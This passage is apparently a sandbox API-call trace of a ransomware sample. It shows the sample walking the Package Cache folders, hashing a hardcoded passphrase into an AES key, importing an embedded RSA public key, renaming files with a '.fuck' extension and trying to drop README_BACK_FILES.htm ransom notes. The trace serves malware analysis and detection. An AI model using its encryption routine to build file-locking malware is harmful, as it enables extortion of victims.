hFindFile=0x27175e8, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0238.051] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9f070 | out: lpSystemTimeAsFileTime=0x2b9f070) [0238.051] GetLastError () returned 0x5 [0238.051] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm" (normalized: "c:\\programdata\\package cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm")) returned 0x20 [0238.052] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm", dwFileAttributes=0x80) returned 0 [0238.052] CreateFileA (lpFileName="C:\\\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm" (normalized: "c:\\programdata\\package cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.052] CreateFileA (lpFileName="C:\\\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm.gsg" (normalized: "c:\\programdata\\package cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.052] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm.gsg", dwFileAttributes=0x2) returned 0 [0238.052] CryptAcquireContextA (in: phProv=0x2b9e06c, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9e06c*=0x2858160) returned 1 [0238.054] CryptCreateHash (in: hProv=0x2858160, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9e070 | out: phHash=0x2b9e070) returned 1 [0238.054] lstrlenA (lpString="GASinrxNGZdGxepxtSAFGoQZzMlQm") returned 29 [0238.055] CryptHashData (hHash=0x2845ea0, pbData=0x2ecb20, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0238.055] CryptDeriveKey (in: hProv=0x2858160, Algid=0x6610, hBaseData=0x2845ea0, dwFlags=0x1000000, phKey=0x2b9e05c | out: phKey=0x2b9e05c*=0x28467e0) returned 1 [0238.055] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9e078, pcbBinary=0x2b9e058, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9e078, pcbBinary=0x2b9e058, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0238.055] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9e078, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9e04c, pcbStructInfo=0x2b9e054 | out: pvStructInfo=0x2b9e04c, pcbStructInfo=0x2b9e054) returned 1 [0238.055] CryptAcquireContextA (in: phProv=0x2b9e068, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9e068*=0x2858f30) returned 1 [0238.055] CryptImportPublicKeyInfo (in: hCryptProv=0x2858f30, dwCertEncodingType=0x1, pInfo=0x2869868*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2869898*, PublicKey.cbData=0x8c, PublicKey.pbData=0x28698a0*, PublicKey.cUnusedBits=0x0), phKey=0x2b9e060 | out: phKey=0x2b9e060*=0x2846c60) returned 1 [0238.055] CryptEncrypt (in: hKey=0x2846c60, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9e050*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9e050*=0x80) returned 1 [0238.055] CryptEncrypt (in: hKey=0x2846c60, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x285ae00*, pdwDataLen=0x2b9e064*=0x18, dwBufLen=0x80 | out: pbData=0x285ae00*, pdwDataLen=0x2b9e064*=0x80) returned 1 [0238.056] WriteFile (in: hFile=0xffffffff, lpBuffer=0x285ae00, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0) returned 0 [0238.056] ReadFile (in: hFile=0xffffffff, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e074, lpOverlapped=0x0 | out: lpBuffer=0x277e300, lpNumberOfBytesRead=0x2b9e074*=0x0, lpOverlapped=0x0) returned 0 [0238.056] CryptEncrypt (in: hKey=0x28467e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9e074*=0x0, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9e074*=0x10) returned 1 [0238.056] WriteFile (in: hFile=0xffffffff, lpBuffer=0x277e300, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0) returned 0 [0238.056] CloseHandle (hObject=0xffffffff) returned 1 [0238.056] CloseHandle (hObject=0xffffffff) returned 1 [0238.056] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm.gsg" (normalized: "c:\\programdata\\package cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm.gsg"), lpNewFileName="C:\\\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm" (normalized: "c:\\programdata\\package cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm"), bFailIfExists=0) returned 0 [0238.056] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm", dwFileAttributes=0x0) returned 0 [0238.056] DeleteFileA (lpFileName="C:\\\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm.gsg" (normalized: "c:\\programdata\\package cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm.gsg")) returned 0 [0238.057] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm" (normalized: "c:\\programdata\\package cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm"), lpNewFileName="C:\\\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm.fuck" (normalized: "c:\\programdata\\package cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm.fuck")) returned 0 [0238.057] CryptDestroyHash (hHash=0x2845ea0) returned 1 [0238.057] CryptDestroyKey (hKey=0x28467e0) returned 1 [0238.057] CryptReleaseContext (hProv=0x2858160, dwFlags=0x0) returned 1 [0238.057] FindNextFileA (in: hFindFile=0x27175e8, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0238.057] FindNextFileA (in: hFindFile=0x27175e8, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 0 [0238.057] FindClose (in: hFindFile=0x27175e8 | out: hFindFile=0x27175e8) returned 1 [0238.058] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\package cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\readme_back_files.htm")) returned 0xffffffff [0238.058] AreFileApisANSI () returned 1 [0238.058] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x282e3e0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 91 [0238.058] CreateFileW (lpFileName="C:\\\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\package cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9f2e4, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.058] GetLastError () returned 0x5 [0238.058] GetLastError () returned 0x5 [0238.058] FindNextFileA (in: hFindFile=0x28463e0, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0238.058] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Package Cache\\{74d0e5db-b326-4dae-a6b2-445b9de1836e}\\*.*", lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 0x2845de0 [0238.058] FindNextFileA (in: hFindFile=0x2845de0, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0238.058] FindNextFileA (in: hFindFile=0x2845de0, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0238.059] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9f070 | out: lpSystemTimeAsFileTime=0x2b9f070) [0238.059] GetLastError () returned 0x5 [0238.059] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{74d0e5db-b326-4dae-a6b2-445b9de1836e}\\state.rsm" (normalized: "c:\\programdata\\package cache\\{74d0e5db-b326-4dae-a6b2-445b9de1836e}\\state.rsm")) returned 0x20 [0238.059] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{74d0e5db-b326-4dae-a6b2-445b9de1836e}\\state.rsm", dwFileAttributes=0x80) returned 0 [0238.060] CreateFileA (lpFileName="C:\\\\ProgramData\\Package Cache\\{74d0e5db-b326-4dae-a6b2-445b9de1836e}\\state.rsm" (normalized: "c:\\programdata\\package cache\\{74d0e5db-b326-4dae-a6b2-445b9de1836e}\\state.rsm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.060] CreateFileA (lpFileName="C:\\\\ProgramData\\Package Cache\\{74d0e5db-b326-4dae-a6b2-445b9de1836e}\\state.rsm.gsg" (normalized: "c:\\programdata\\package cache\\{74d0e5db-b326-4dae-a6b2-445b9de1836e}\\state.rsm.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.060] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{74d0e5db-b326-4dae-a6b2-445b9de1836e}\\state.rsm.gsg", dwFileAttributes=0x2) returned 0 [0238.060] CryptAcquireContextA (in: phProv=0x2b9e06c, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9e06c*=0x2858160) returned 1 [0238.062] CryptCreateHash (in: hProv=0x2858160, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9e070 | out: phHash=0x2b9e070) returned 1 [0238.062] lstrlenA (lpString="GASinrxNGZdGxepxtSAFGoQZzMlQm") returned 29 [0238.062] CryptHashData (hHash=0x2845ea0, pbData=0x2ec800, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0238.062] CryptDeriveKey (in: hProv=0x2858160, Algid=0x6610, hBaseData=0x2845ea0, dwFlags=0x1000000, phKey=0x2b9e05c | out: phKey=0x2b9e05c*=0x28469e0) returned 1 [0238.062] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9e078, pcbBinary=0x2b9e058, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9e078, pcbBinary=0x2b9e058, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0238.062] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9e078, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9e04c, pcbStructInfo=0x2b9e054 | out: pvStructInfo=0x2b9e04c, pcbStructInfo=0x2b9e054) returned 1 [0238.062] CryptAcquireContextA (in: phProv=0x2b9e068, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9e068*=0x285a608) returned 1 [0238.063] CryptImportPublicKeyInfo (in: hCryptProv=0x285a608, dwCertEncodingType=0x1, pInfo=0x28691e8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2869218*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2869220*, PublicKey.cUnusedBits=0x0), phKey=0x2b9e060 | out: phKey=0x2b9e060*=0x2816f58) returned 1 [0238.063] CryptEncrypt (in: hKey=0x2816f58, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9e050*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9e050*=0x80) returned 1 [0238.063] CryptEncrypt (in: hKey=0x2816f58, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x285ad78*, pdwDataLen=0x2b9e064*=0x18, dwBufLen=0x80 | out: pbData=0x285ad78*, pdwDataLen=0x2b9e064*=0x80) returned 1 [0238.063] WriteFile (in: hFile=0xffffffff, lpBuffer=0x285ad78, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0) returned 0 [0238.063] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e074, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9e074*=0x0, lpOverlapped=0x0) returned 0 [0238.063] CryptEncrypt (in: hKey=0x28469e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9e074*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9e074*=0x10) returned 1 [0238.063] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0) returned 0 [0238.063] CloseHandle (hObject=0xffffffff) returned 1 [0238.063] CloseHandle (hObject=0xffffffff) returned 1 [0238.063] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Package Cache\\{74d0e5db-b326-4dae-a6b2-445b9de1836e}\\state.rsm.gsg" (normalized: "c:\\programdata\\package cache\\{74d0e5db-b326-4dae-a6b2-445b9de1836e}\\state.rsm.gsg"), lpNewFileName="C:\\\\ProgramData\\Package Cache\\{74d0e5db-b326-4dae-a6b2-445b9de1836e}\\state.rsm" (normalized: "c:\\programdata\\package cache\\{74d0e5db-b326-4dae-a6b2-445b9de1836e}\\state.rsm"), bFailIfExists=0) returned 0 [0238.063] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{74d0e5db-b326-4dae-a6b2-445b9de1836e}\\state.rsm", dwFileAttributes=0x0) returned 0 [0238.064] DeleteFileA (lpFileName="C:\\\\ProgramData\\Package Cache\\{74d0e5db-b326-4dae-a6b2-445b9de1836e}\\state.rsm.gsg" (normalized: "c:\\programdata\\package cache\\{74d0e5db-b326-4dae-a6b2-445b9de1836e}\\state.rsm.gsg")) returned 0 [0238.064] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Package Cache\\{74d0e5db-b326-4dae-a6b2-445b9de1836e}\\state.rsm" (normalized: "c:\\programdata\\package cache\\{74d0e5db-b326-4dae-a6b2-445b9de1836e}\\state.rsm"), lpNewFileName="C:\\\\ProgramData\\Package Cache\\{74d0e5db-b326-4dae-a6b2-445b9de1836e}\\state.rsm.fuck" (normalized: "c:\\programdata\\package cache\\{74d0e5db-b326-4dae-a6b2-445b9de1836e}\\state.rsm.fuck")) returned 0 [0238.064] CryptDestroyHash (hHash=0x2845ea0) returned 1 [0238.064] CryptDestroyKey (hKey=0x28469e0) returned 1 [0238.064] CryptReleaseContext (hProv=0x2858160, dwFlags=0x0) returned 1 [0238.064] FindNextFileA (in: hFindFile=0x2845de0, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0238.064] FindNextFileA (in: hFindFile=0x2845de0, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 0 [0238.064] FindClose (in: hFindFile=0x2845de0 | out: hFindFile=0x2845de0) returned 1 [0238.065] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{74d0e5db-b326-4dae-a6b2-445b9de1836e}\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\package cache\\{74d0e5db-b326-4dae-a6b2-445b9de1836e}\\readme_back_files.htm")) returned 0xffffffff [0238.065] AreFileApisANSI () returned 1 [0238.065] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x282e3e0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 91 [0238.065] CreateFileW (lpFileName="C:\\\\ProgramData\\Package Cache\\{74d0e5db-b326-4dae-a6b2-445b9de1836e}\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\package cache\\{74d0e5db-b326-4dae-a6b2-445b9de1836e}\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9f2e4, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.065] GetLastError () returned 0x5 [0238.065] GetLastError () returned 0x5 [0238.065] FindNextFileA (in: hFindFile=0x28463e0, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0238.065] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\*.*", lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 0x2817298 [0238.066] FindNextFileA (in: hFindFile=0x2817298, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0238.066] FindNextFileA (in: hFindFile=0x2817298, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0238.066] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\*.*", lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0x2817858 [0238.066] FindNextFileA (in: hFindFile=0x2817858, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0238.066] FindNextFileA (in: hFindFile=0x2817858, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0238.067] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\*.*", lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0x2845de0 [0238.067] FindNextFileA (in: hFindFile=0x2845de0, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0238.067] FindNextFileA (in: hFindFile=0x2845de0, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0238.067] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e938 | out: lpSystemTimeAsFileTime=0x2b9e938) [0238.067] GetLastError () returned 0x5 [0238.067] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\\packages\\vcruntimeminimum_amd64\\cab1.cab")) returned 0x20 [0238.068] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\cab1.cab", dwFileAttributes=0x80) returned 0 [0238.068] CreateFileA (lpFileName="C:\\\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\\packages\\vcruntimeminimum_amd64\\cab1.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.069] CreateFileA (lpFileName="C:\\\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\cab1.cab.gsg" (normalized: "c:\\programdata\\package cache\\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\\packages\\vcruntimeminimum_amd64\\cab1.cab.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.069] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\cab1.cab.gsg", dwFileAttributes=0x2) returned 0 [0238.069] CryptAcquireContextA (in: phProv=0x2b9d934, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d934*=0x285a250) returned 1 [0238.071] CryptCreateHash (in: hProv=0x285a250, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d938 | out: phHash=0x2b9d938) returned 1 [0238.071] lstrlenA (lpString="GASinrxNGZdGxepxtSAFGoQZzMlQm") returned 29 [0238.071] CryptHashData (hHash=0x2845ea0, pbData=0x2ec6c0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0238.071] CryptDeriveKey (in: hProv=0x285a250, Algid=0x6610, hBaseData=0x2845ea0, dwFlags=0x1000000, phKey=0x2b9d924 | out: phKey=0x2b9d924*=0x28467e0) returned 1 [0238.071] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----i", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0238.071] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d940, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c | out: pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c) returned 1 [0238.071] CryptAcquireContextA (in: phProv=0x2b9d930, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d930*=0x285abe0) returned 1 [0238.072] CryptImportPublicKeyInfo (in: hCryptProv=0x285abe0, dwCertEncodingType=0x1, pInfo=0x2869c78*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2869ca8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2869cb0*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d928 | out: phKey=0x2b9d928*=0x27175e8) returned 1 [0238.072] CryptEncrypt (in: hKey=0x27175e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d918*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d918*=0x80) returned 1 [0238.072] CryptEncrypt (in: hKey=0x27175e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x285a470*, pdwDataLen=0x2b9d92c*=0x18, dwBufLen=0x80 | out: pbData=0x285a470*, pdwDataLen=0x2b9d92c*=0x80) returned 1 [0238.072] WriteFile (in: hFile=0xffffffff, lpBuffer=0x285a470, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0238.072] ReadFile (in: hFile=0xffffffff, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d93c, lpOverlapped=0x0 | out: lpBuffer=0x277e300, lpNumberOfBytesRead=0x2b9d93c*=0x0, lpOverlapped=0x0) returned 0 [0238.072] CryptEncrypt (in: hKey=0x28467e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d93c*=0x0, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d93c*=0x10) returned 1 [0238.072] WriteFile (in: hFile=0xffffffff, lpBuffer=0x277e300, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0238.072] CloseHandle (hObject=0xffffffff) returned 1 [0238.072] CloseHandle (hObject=0xffffffff) returned 1 [0238.072] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\cab1.cab.gsg" (normalized: "c:\\programdata\\package cache\\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\\packages\\vcruntimeminimum_amd64\\cab1.cab.gsg"), lpNewFileName="C:\\\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\\packages\\vcruntimeminimum_amd64\\cab1.cab"), bFailIfExists=0) returned 0 [0238.072] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\cab1.cab", dwFileAttributes=0x0) returned 0 [0238.073] DeleteFileA (lpFileName="C:\\\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\cab1.cab.gsg" (normalized: "c:\\programdata\\package cache\\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\\packages\\vcruntimeminimum_amd64\\cab1.cab.gsg")) returned 0 [0238.073] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\\packages\\vcruntimeminimum_amd64\\cab1.cab"), lpNewFileName="C:\\\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\cab1.cab.fuck" (normalized: 